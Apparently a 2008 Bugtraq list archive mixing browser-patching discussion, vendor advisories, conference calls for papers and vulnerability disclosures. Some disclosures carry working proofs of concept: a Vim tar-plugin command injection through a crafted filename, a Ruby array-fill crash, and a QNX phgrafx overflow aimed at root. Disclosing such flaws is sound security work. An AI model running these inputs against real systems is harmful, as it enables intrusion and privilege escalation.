RE: New Paper: More than 600 million users surf at high risk
--On July 1, 2008 3:31:32 PM -0400 Larry Seltzer <[EMAIL PROTECTED]> wrote: From your paper: It is noteworthy that it has taken 19 months since the initial general availability of IE7 (public release October 2006) to reach 52.5% proliferation amongst users that navigate the Internet with Microsoft's Web browser. Meanwhile, 92.2% of Firefox users have migrated to FF2. Could this be due to the fact that Mozilla stops supporting, and issuing updates for old versions just a few months after the release of a new one? My completely non-scientific, unsupported-by-empirical-evidence answer is no. It's because people who use Firefox tend to be more aware of security threats and the need to keep software up to date. It could also be (at least in part) because Firefox has a built-in, enabled-by-default, update available warning system. Paul Schmehl ([EMAIL PROTECTED]) Senior Information Security Analyst The University of Texas at Dallas http://www.utdallas.edu/ir/security/ p7sdARXLhNN0n.p7s Description: S/MIME cryptographic signature
[SECURITY] [DSA 1560-1] New sympa packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1600-1 [EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp July 01, 2008 http://www.debian.org/security/faq - Package: sympa Vulnerability : dos Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-1648 Debian Bug : 475163 It was discovered that sympa, a modern mailing list manager, would crash when processing certain types of malformed messages. For the stable distribution (etch), this problem has been fixed in version 5.2.3-1.2+etch1. For the unstable distribution (sid), this problem has been fixed in version 5.3.4-4. We recommend that you upgrade your sympa package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1.dsc Size/MD5 checksum: 625 c7e720e56b1c4e9778cea822ed150a19 http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1.diff.gz Size/MD5 checksum:96804 a93d8ec3dcbc0a0aed99e513c5749c0e http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3.orig.tar.gz Size/MD5 checksum: 5102528 355cb9174841205831191c93a83da895 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_alpha.deb Size/MD5 checksum: 3589148 26b92215ed7b17531c3702ff76b30901 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_amd64.deb Size/MD5 checksum: 3591854 531781d522ad5f02e6c5b658883ed37d arm architecture (ARM) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_arm.deb Size/MD5 checksum: 3590606 dc3437760b7db4761f90e992e3638c52 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_hppa.deb Size/MD5 checksum: 3591482 5601933860831577cb017cb0aa3b31fe i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_i386.deb Size/MD5 checksum: 3567454 0c6e3d6046f7d0e9920ed7ce9780b103 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_ia64.deb Size/MD5 checksum: 3571256 c294184494968264ff0857fc2b907711 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_mips.deb Size/MD5 checksum: 3584362 1b3371fe22966b198a3c338167e71909 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_powerpc.deb Size/MD5 checksum: 3568314 57c566c13cd31f66bbe3652b4c9ea3e7 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_s390.deb Size/MD5 checksum: 3568574 afab57a71590dcdd685746b6500040b0 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_sparc.deb Size/MD5 checksum: 3568016 0bf312e31bb5df28404ea40842845caf These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [EMAIL PROTECTED] Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFIapKKwM/Gs81MDZ0RAqAtAJ4qQlnuRralKZTMQhtDqYvMXfaqdQCgof4S 6REh7OX9zxqgWYGHqQWtEpQ= =ANTa -END PGP SIGNATURE-
Re: Collection of Vulnerabilities in Fully Patched Vim 7.1
On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar <[EMAIL PROTECTED]> wrote:
>
> Jan Minar wrote:
>
>> 1. Summary
>>
>> Product : Vim -- Vi IMproved
>> Version : Tested with 7.1.314 and 6.4
>> Impact : Arbitrary code execution
>> Wherefrom: Local and remote
>> Original : http://www.rdancer.org/vulnerablevim.html
>>
>> Improper quoting in some parts of Vim written in the Vim Script can lead to
>> arbitrary code execution upon opening a crafted file.
> Note that version 7.1.314, as reported in the Summary, does not have
> most of the reported problems. The problems in the plugins have also
> been fixed, this requires updating the runtime files. Information about
> that can be found at http://www.vim.org/runtime.php
I do apologize: as written in the advisory, the version I worked with
was 7.1.298. 7.1.314 was only partly vulnerable. FWIW, I have
updated the advisory at http://www.rdancer.orgvulnerablevim.html .
Thanks to Bram for all the good work.
7.2a.10 with updated runtime is still vulnerable to the zipplugin
attack, and an updated tarplugin attack:
---
Test results below ---
---
filetype.vim
strong : EXPLOIT FAILED
weak: EXPLOIT FAILED
tarplugin : EXPLOIT FAILED
tarplugin.updated: VULNERABLE
zipplugin : VULNERABLE
xpm.vim
xpm : EXPLOIT FAILED
xpm2: EXPLOIT FAILED
remote : EXPLOIT FAILED
gzip_vim : EXPLOIT FAILED
netrw : EXPLOIT FAILED
The original tarplugin exploit now produces a string of telling error messages:
/bin/bash: so%: command not found
tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo:
Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
/bin/bash: retu: command not found
/bin/bash: bar.tar|retu|'bar.tar: command not found
It's easy to see that it is still possible to execute arbitrary shell commands.
$VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:
136 if tarfile =~# '\.\(gz\|tgz\)$'
137 " call Decho("1: exe silent r! gzip -d -c
".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
*138exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." |
".g:tar_cmd." -".g:tar_browseoptions." - "
139 elseif tarfile =~# '\.lrp'
140 " call Decho("2: exe silent r! cat --
".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd."
-".g:tar_browseoptions." - ")
*141exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c
-|".g:tar_cmd." -".g:tar_browseoptions." - "
142 elseif tarfile =~# '\.bz2$'
143 " call Decho("3: exe silent r! bzip2 -d -c
".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
*144exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." |
".g:tar_cmd." -".g:tar_browseoptions." - "
145 else
146 " call Decho("4: exe silent r! ".g:tar_cmd."
-".g:tar_browseoptions." ".s:Escape(tarfile))
**147exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions."
".s:Escape(tarfile)
[...]
444 fun s:Escape(name)
445 " shellescape() was added by patch 7.0.111
446 if exists("*shellescape")
447let qnameq= shellescape(a:name)
448 else
449let qnameq= g:tar_shq . a:name . g:tar_shq
450 endif
451 return qnameq
452 endfun
(*) s:Escape() does not suffice, as it fails to escape ``%'' and friends.
(**) tar(1) allows arbitrary command execution via options ``--to-command'',
and ``--use-compress-program''.
The updated tarplugin attack is rather simple:
$ rm -rf ./*
$ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 |
xxd -r\`;'bar.tar"
$ vim +:q ./foo*
$ ls -l pwned
-rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned
Cheers,
Jan Minar.
Deepsec Talks 2007 are online - registration for 2008 is open
Dear Madam, dear Sir, DeepSec Vienna, the annual In-Depth Security Conference has opened online registrations for 2008. Registrations will receive a discount of 5% off the regular fees until August 31st if you use the following promotional code: earlybird-L4KZIEUE on our online registration form at https://deepsec.net/register/ Videos from 2007 are online: Also we are happy to announce that talks from last years conference are online. Listen to last years talks in full length at: http://video.google.com/videosearch?q=deepsec&sitesearch=# Call for Papers still Open for two weeks: If you have some good ideas for a Talk at the conference and haven't decided yet to submit we encourage you to do so now. We still accept submissions at https://deepsec.net/cfp/ or via e-mail to: [EMAIL PROTECTED] We hope to hear from you and of course to meet in Vienna in November! Best Regards, Paul Böhm, René Pfeiffer, Michael Kafka DeepSec GmbH -- DeepSec In-Depth Security Conference November 11nd to 14th 2008, Vienna, Austria https://deepsec.net/
RE: New Paper: More than 600 million users surf at high risk
>From your paper: >>It is noteworthy that it has taken 19 months since the initial general availability of IE7 (public release October 2006) to reach 52.5% proliferation amongst users that navigate the Internet with Microsoft's Web browser. Meanwhile, 92.2% of Firefox users have migrated to FF2. Could this be due to the fact that Mozilla stops supporting, and issuing updates for old versions just a few months after the release of a new one? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine [EMAIL PROTECTED] -Original Message- From: Larry Seltzer Sent: Tuesday, July 01, 2008 3:26 PM To: 'Stefan Frei'; bugtraq@securityfocus.com Subject: RE: New Paper: More than 600 million users surf at high risk A reply from Robert Hensing at Microsoft (http://blogs.technet.com/robert_hensing/archive/2008/07/01/vulnerable-w eb-browser-study-full-of-fail.aspx) says that your study did not include minor version information for Internet Explorer, probably because such information is not reported in the user-agent string. But fully-patched copies of IE5 and IE6 are not insecure in the same way as an unsupported version; Microsoft is still supporting them. So is it true that your study calls anyone running IE7 secure, and anyone running IE5 or IE6 insecure, regardless of their patch levels? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine [EMAIL PROTECTED] -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Stefan Frei Sent: Tuesday, July 01, 2008 11:40 AM To: bugtraq@securityfocus.com Subject: New Paper: More than 600 million users surf at high risk Hi List, For the last 18 month we analyzed the daily USER-AGENT data collected by Google's Web search and application servers around the world to study how users patch and update their Web browsers. We came out that approximately 637 million (or 45.2 percent) users currently surf the Web on a daily basis with an out-of-date browser - i.e. not running a current, fully patched Web browser version. And this is only the tip of what we call the "Insecurity Iceberg", not counting all the vulnerable browser plug-ins. One of the new concepts we came up for combating the inadequacies of Web browser patching was that of applying the food industries "Best Before" date to the Web browser and its plug-ins. Paper: Understanding the Web browser threat: Examination of vulnerable online Web browser populations and the "insecurity iceberg" Authors - Stefan Frei, Communication Systems Group, ETH Zurich, Switzerland - Thomas Duebendorfer, Google Switzerland GmbH - Gunter Ollmann, IBM Internet Security Systems, USA - Martin May, Communication Systems Group, ETH Zurich, Switzerland Paper Download: http://www.techzoom.net/insecurity-iceberg Regards Stefan Frei
RE: New Paper: More than 600 million users surf at high risk
A reply from Robert Hensing at Microsoft (http://blogs.technet.com/robert_hensing/archive/2008/07/01/vulnerable-w eb-browser-study-full-of-fail.aspx) says that your study did not include minor version information for Internet Explorer, probably because such information is not reported in the user-agent string. But fully-patched copies of IE5 and IE6 are not insecure in the same way as an unsupported version; Microsoft is still supporting them. So is it true that your study calls anyone running IE7 secure, and anyone running IE5 or IE6 insecure, regardless of their patch levels? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine [EMAIL PROTECTED] -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Stefan Frei Sent: Tuesday, July 01, 2008 11:40 AM To: bugtraq@securityfocus.com Subject: New Paper: More than 600 million users surf at high risk Hi List, For the last 18 month we analyzed the daily USER-AGENT data collected by Google's Web search and application servers around the world to study how users patch and update their Web browsers. We came out that approximately 637 million (or 45.2 percent) users currently surf the Web on a daily basis with an out-of-date browser - i.e. not running a current, fully patched Web browser version. And this is only the tip of what we call the "Insecurity Iceberg", not counting all the vulnerable browser plug-ins. One of the new concepts we came up for combating the inadequacies of Web browser patching was that of applying the food industries "Best Before" date to the Web browser and its plug-ins. Paper: Understanding the Web browser threat: Examination of vulnerable online Web browser populations and the "insecurity iceberg" Authors - Stefan Frei, Communication Systems Group, ETH Zurich, Switzerland - Thomas Duebendorfer, Google Switzerland GmbH - Gunter Ollmann, IBM Internet Security Systems, USA - Martin May, Communication Systems Group, ETH Zurich, Switzerland Paper Download: http://www.techzoom.net/insecurity-iceberg Regards Stefan Frei
Vuln name: Ruby rb_ary_fill() DOS
The advisory could be found here:
http://securenetwork.it/ricerca/advisory/download/SN-2008-02.txt
Secure Network - Security Research Advisory
Vuln name: Ruby rb_ary_fill() DOS
Systems affected: ruby 1.8.x, 1.9.x
Systems not affected: -
Severity: Medium
Local/Remote: Local/Remote
Vendor URL: http://www.ruby-lang.org/
Author(s): Vincenzo "snagg" Iozzo - [EMAIL PROTECTED]
Vendor disclosure: 23rd June 2008
Vendor acknowledged: 25th June 2008
Vendor patch release: 25th June 2008
Public disclosure: 30th June 2008
Advisory number: SN-2008-02
Advisory URL: http://www.securenetwork.it/advisories/
*** SUMMARY ***
Ruby is an interpreted language, used in a wide range of applications.
The specific issue is a Denial of Services vulnerability, caused by an integer
overflow. However it doesn't allow arbitrary code execution.
On Ruby on Rails, an attacker may craft specific requests and by XSS (for
example) can cause a legitimate user to crash the web server.
*** VULNERABILITY DETAILS ***
Integer overflow (Dos).
The vulnerability was found in rb_ary_fill().
Looking inside the application source code:
## CUT HERE ##
rb_ary_modify(ary);
end = beg + len;
if (end < 0) {
rb_raise(rb_eArgError, "argument too big");
}
if (end > RARRAY(ary)->len) {
if (end >= RARRAY(ary)->aux.capa) {
REALLOC_N(RARRAY(ary)->ptr, VALUE, end);
RARRAY(ary)->aux.capa = end;
}
## CUT HERE ##
The len value is incremented by one in a previous function and it is specified
by the user. The lack of sanity check on the input, leads to an integer
overflow here:
## CUT HERE ##
REALLOC_N(RARRAY(ary)->ptr, VALUE, end);
## CUT HERE ##
This macro, in fact, will allocate end * VALUE. On 32bit architectures VALUE is
4. If an attacker specifies a value of 0x3fff, this macro will allocate a
memory region of 0, so that next time ary->ptr is accessed, it will raise a
SIGSEGV.(NULL referencing)
*** EXPLOIT ***
a = []
a.fill("A",0..0x3fff)
*** FIX INFORMATION ***
http://svn.ruby-lang.org/cgi-bin/viewvc.cgi/trunk/array.c?view=markup
*
*** LEGAL NOTICES ***
*
Secure Network (www.securenetwork.it) is an information security company,
which provides consulting and training services, and engages in security
research and development.
We are committed to open, full disclosure of vulnerabilities, cooperating
with software developers for properly handling disclosure issues.
This advisory is copyright 2008 Secure Network S.r.l. Permission is
hereby granted for the redistribution of this alert, provided that it is
not altered except by reformatting it, and that due credit is given. It
may not be edited in any way without the express consent of Secure Network
S.r.l. Permission is explicitly given for insertion in vulnerability
databases and similars, provided that due credit is given to Secure Network
The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. This information is
provided as-is, as a free service to the community by Secure Network
research staff. There are no warranties with regard to this information.
Secure Network does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
If you have any comments or inquiries, or any issue with what is reported
in this advisory, please inform us as soon as possible.
E-mail: [EMAIL PROTECTED]
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 02 24126788
New Paper: More than 600 million users surf at high risk
Hi List, For the last 18 month we analyzed the daily USER-AGENT data collected by Google's Web search and application servers around the world to study how users patch and update their Web browsers. We came out that approximately 637 million (or 45.2 percent) users currently surf the Web on a daily basis with an out-of-date browser – i.e. not running a current, fully patched Web browser version. And this is only the tip of what we call the "Insecurity Iceberg", not counting all the vulnerable browser plug-ins. One of the new concepts we came up for combating the inadequacies of Web browser patching was that of applying the food industries "Best Before" date to the Web browser and its plug-ins. Paper: Understanding the Web browser threat: Examination of vulnerable online Web browser populations and the "insecurity iceberg" Authors - Stefan Frei, Communication Systems Group, ETH Zurich, Switzerland - Thomas Duebendorfer, Google Switzerland GmbH - Gunter Ollmann, IBM Internet Security Systems, USA - Martin May, Communication Systems Group, ETH Zurich, Switzerland Paper Download: http://www.techzoom.net/insecurity-iceberg Regards Stefan Frei
[ GLSA 200807-02 ] Motion: Execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200807-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Motion: Execution of arbitrary code Date: July 01, 2008 Bugs: #227053 ID: 200807-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in Motion might result in the execution of arbitrary code. Background == Motion is a program that monitors the video signal from one or more cameras and is able to detect motions. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-video/motion < 3.2.10.1 >= 3.2.10.1 Description === Nico Golde reported an off-by-one error within the read_client() function in the webhttpd.c file, leading to a stack-based buffer overflow. Stefan Cornelius (Secunia Research) reported a boundary error within the same function, also leading to a stack-based buffer overflow. Both vulnerabilities require that the HTTP Control interface is enabled. Impact == A remote attacker could exploit these vulnerabilities by sending an overly long or specially crafted request to a vulnerable Motion HTTP control interface, possibly resulting in the execution of arbitrary code with the privileges of the motion user. Workaround == There is no known workaround at this time. Resolution == All Motion users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-video/motion-3.2.10.1" References == [ 1 ] CVE-2008-2654 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2654 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200807-02.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
[security bulletin] HPSBMA02345 SSRT080039 rev.1 - HP System Management Homepage (SMH) for Linux and Windows, Remote Cross Site Scripting (XSS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01488878 Version: 1 HPSBMA02345 SSRT080039 rev.1 - HP System Management Homepage (SMH) for Linux and Windows, Remote Cross Site Scripting (XSS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2008-06-30 Last Updated: 2008-06-30 Potential Security Impact: Remote cross site scripting (XSS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP System Management Homepage (SMH) for Linux and Windows. This vulnerability could by exploited remotely to allow cross site scripting (XSS). References: CVE-2008-1663 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP System Management Homepage (SMH) v2.1.10 and v2.1.11 running on Linux and Windows. BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2008-1663 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002. RESOLUTION HP has provided System Management Homepage (SMH) v2.1.12 or subsequent to resolve these vulnerabilities. SMH v2.1.12, is available from the following web sites: HP System Management Homepage for Linux (x86) v2.1.12-200) can be downloaded from http://h2.www2.hp.com/bizsupport/TechSupport/SoftwareDescription.jsp?swItem=MTX-6bfaf43a118b47098e763096e7 HP System Management Homepage for Linux (AMD64/EM64T) v2.1.12-200 can be downloaded from http://h2.www2.hp.com/bizsupport/TechSupport/SoftwareDescription.jsp?swItem=MTX-e280953be19b41a385c99a2133 HP System Management Homepage for Windows v2.1.12.201 can be downloaded from http://h2.www2.hp.com/bizsupport/TechSupport/SoftwareDescription.jsp?swItem=MTX-0ee8400155ae4c2bb066f244b2 PRODUCT SPECIFIC INFORMATION HISTORY: Version:1 (rev.1) - 30 June 2008 Initial Release Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, inc
[ GLSA 200807-01 ] Python: Multiple integer overflows
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200807-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Python: Multiple integer overflows Date: July 01, 2008 Bugs: #216673, #217221 ID: 200807-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple integer overflows may allow for Denial of Service. Background == Python is an interpreted, interactive, object-oriented programming language. Affected packages = --- Package / Vulnerable /Unaffected --- 1 dev-lang/python < 2.4.4-r13 *>= 2.3.6-r6 >= 2.4.4-r13 Description === Multiple vulnerabilities were discovered in Python: * David Remahl reported multiple integer overflows in the file imageop.c, leading to a heap-based buffer overflow (CVE-2008-1679). This issue is due to an incomplete fix for CVE-2007-4965. * Justin Ferguson discovered that an integer signedness error in the zlib extension module might trigger insufficient memory allocation and a buffer overflow via a negative signed integer (CVE-2008-1721). * Justin Ferguson discovered that insufficient input validation in the PyString_FromStringAndSize() function might lead to a buffer overflow (CVE-2008-1887). Impact == A remote attacker could exploit these vulnerabilities to cause a Denial of Service or possibly the remote execution of arbitrary code with the privileges of the user running Python. Workaround == There is no known workaround at this time. Resolution == The imageop module is no longer built in the unaffected versions. All Python 2.3 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/python-2.3.6-r6" All Python 2.4 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/python-2.4.4-r13" References == [ 1 ] CVE-2008-1679 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1679 [ 2 ] CVE-2008-1721 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1721 [ 3 ] CVE-2008-1887 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1887 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200807-01.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
[SCANIT-2008-001] QNX phgrafx Privilege Escalation Vulnerability
QNX phgrafx Privilege Escalation Vulnerability Scanit R&D Labs Security Advisory http://www.scanit.net/rd/advisories/ Jun 30, 2008 Filename: SCANIT-2008-001.txt SCANIT ID: SCANIT-2008-001 Published: June 30th, 2008 I. Summary QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating system designed for use in embedded systems. From QNX's website: "Companies worldwide like Cisco, Delphi, Siemens, Alcatel and Texaco depend on the QNX technology for network routers, medical devices, intelligent transportation systems, safety and security systems, next-generation robotics, and other mission-critical applications. In addition, QNX forms the core for Ford Motor Co.'s Lincoln Aviator IAV, an engineering concept vehicle. The new system supports the development of next-generation in-car communications, infotainment, and telematics applications." More information is available at http://www.qnx.com/products/rtos/. Local exploration of a buffer overflow vulnerability inside /usr/photon/bin/phgrafx included by default in QNX RTOS latest version (6.3.2) could allow an attacker to gain root privileges. II. Affected Products Scanit has confirmed the existence of this vulnerability in QNX RTOS 6.3.2 and QNX RTOS 6.3.0. Probably previous versions are vulnerable too. III. Details The vulnerability itself exists due to improper handling of the PHOTON_PATH/palette/*.pal file. When a filename greater than 285 characters is created with the extension .pal in the directory "palette", a stack-based overflow occurs, allowing the attacker to control program flow. # PHOTON_PATH=/tmp # cd /tmp # mkdir palette # cd palette # touch `perl -e 'print "A" x 290 . ".pal"'` # /usr/photon/bin/phgrafx Memory fault (core dumped) # IV. Solution According to the vendor's response: "QNX Software Systems confirms this vulnerability in Momentics 6.3.2 and earlier versions. The phgrafx binary is to be deprecated in future releases. For the time being, it is recommended that the user clear the set user ID bit from the file permissions. If this is done, only the root user may change the graphics configuration." V. Timeline February 20th, 2008 - Vulnerability discovery March 24th, 2008 - First contact attempt March 27th, 2008 - Vendor response June 30th, 2008 - Advisory release VI. Credits This vulnerability was discovered by Scanit's researchers Filipe Balestra and Rodrigo Rubira Branco (BSDaemon) . VII. Contact Scanit's R&D Labs represent Scanit's efforts in security research activities. By keeping track of the newest deffensive and offensive technologies, Scanit's researchers are able to contribute with unpublished works made in-house. This way, by driving the state-of-the-art in computer security, Scanit honors its commitment to stay in the front line of scientific evolution. Reach us at [EMAIL PROTECTED] Visit http://www.scanit.net VIII. Disclaimer The information contained in this document may change without notice. Use of this information constitutes acceptance for use in an "AS IS" condition. There are no warranties regarding the topicality, correctness, completeness or quality of the information provided by this document. Under no circumstances shall the authors be held liable for any direct, indirect, or consequential damages, losses, injuries, or unlawful offences allegedly arising from the use of this information. Copyright 2008 Scanit Middle East FZ/LLC
CFP 25C3 - The 25th Chaos Communication Congress 2008
The 25th Chaos Communication Congress (25C3) is the annual four-day conference organized by the Chaos Computer Club (CCC) in Berlin, Germany. First held in 1984, it since has established itself as "The European Hacker Conference", attracting a diverse audience of thousands of hackers, scientists, artists, and utopists from all around the world. We want you to join and be a part of this unique event which serves as a public platform for cross-culture inspiration and borderless networking. 25C3 is fun! Topics == The 25C3 conference program is roughly divided into six general categories. These categories serve as guidelines for your submissions (and later as a means of orientation for your prospective audience). However, it is not mandatory for your talk to exactly match the descriptions below. Anything that is interesting and/or funny will be taken into consideration. Hacking --- The "Hacking" category addresses topics dealing with technology, concentrating on current research with high technical merit. Traditionally, the majority of all lectures at 25C3 revolve around hacking. Topics in this domain include but are in no way limited to: programming, hardware hacking, cryptography, network and system security, security exploits, and creative use of technology. Making -- The "Making" category is all about making and breaking things and the wonderful stuff you can build in your basement or garage. Most welcome are submissions dealing with the latest in electronics, 3D-fabbing, climate-change survival technology, robots and drones, steam machines, alternative transportation tools and guerilla-style knitting. Science --- The "Science" category covers current or future objects of scientific research that have the potential to radically change our lives, be it basic research or projects conducted for the industry. We are looking for talks and papers on the state of the art in this domain, covering subjects such as nano technology, quantum computing, high frequency physics, bio-technology, brain-computer interfaces, automated analysis of surveillance cctv, etc. Society --- Technology development causes great changes in society and will determine our future. This category is for all talks on subjects like hacker tools and the law, surveillance practices, censorship, intellectual property and copyright issues, data retention, software patents, effects of technology on kids, and the impact of technology on society in general. Culture --- Shaping the world we live in means making it more interesting, entertaining and beautiful. The hacker culture has many facets ranging from electronic art objects, stand-up comedy, geek entertainment, video game and board game culture, music, 3D art to e-text literature and beyond. If you like to show your art and teach others how to make their lives more enjoyable, this category is for you. Community - In addition to individual speakers the Chaos Communication Congress is also inviting groups such as developer teams, projects and activists to present themselves and their topics. Developer groups are also encouraged to ask for support to hold smaller on-site developer conferences and meetings in the course of the Congress. Further Information === The Chaos Communication Congress is a non-profit oriented event and speakers are not paid. However, financial help on travel expenses and accommodation is possible. It needs to be agreed upon after acceptance of the submission, though. Don't be shy and state your requirements in the application when submitting your lecture and we'll work something out! You can find the preliminary agenda and additional information on our 25C3 website at 